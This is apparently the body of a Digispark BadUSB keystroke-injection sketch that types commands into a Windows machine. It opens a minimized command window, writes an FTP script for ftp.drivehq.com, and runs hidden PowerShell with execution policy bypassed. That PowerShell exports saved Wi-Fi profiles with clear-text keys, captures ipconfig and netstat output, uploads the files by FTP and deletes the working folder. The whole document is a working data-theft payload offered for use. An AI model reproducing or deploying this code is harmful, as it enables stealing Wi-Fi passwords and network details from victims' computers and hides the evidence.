DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.delay(1000);
DigiKeyboard.sendKeyStroke(0, MOD_GUI_LEFT,KEY_R);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(100);
DigiKeyboard.print(F("cmd /k mode con:cols=18 lines=1"));
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(100);
DigiKeyboard.print(F("color FE"));
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(100);
DigiKeyboard.print(F("cd %localappdata%"));
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(100);
DigiKeyboard.print(F("mkdir tmp"));
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(100);
DigiKeyboard.print(F("cd tmp"));
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(200);
DigiKeyboard.print(F("powershell -command "'open ftp.drivehq.com' > dat.txt ; 'USERNAME' >> dat.txt ; 'PASSWORD' >> dat.txt ; 'prompt' >> dat.txt ; 'mput *.*' >> dat.txt ; 'quit' >> dat.txt""));
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(200);
DigiKeyboard.print(F("powershell -windowstyle hidden -Executionpolicy bypass -command "cd %localappdata%\tmp ; netsh wlan export profile key=clear ; ipconfig > ipc.txt ; netstat -r > nr.txt ; ftp -s:dat.txt ; cd .. ; Remove-Item -Recurse -Force tmp""));
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(100);
DigiKeyboard.print(F("exit"));
DigiKeyboard.sendKeyStroke(KEY_ENTER);
for(;;){ /*empty*/ }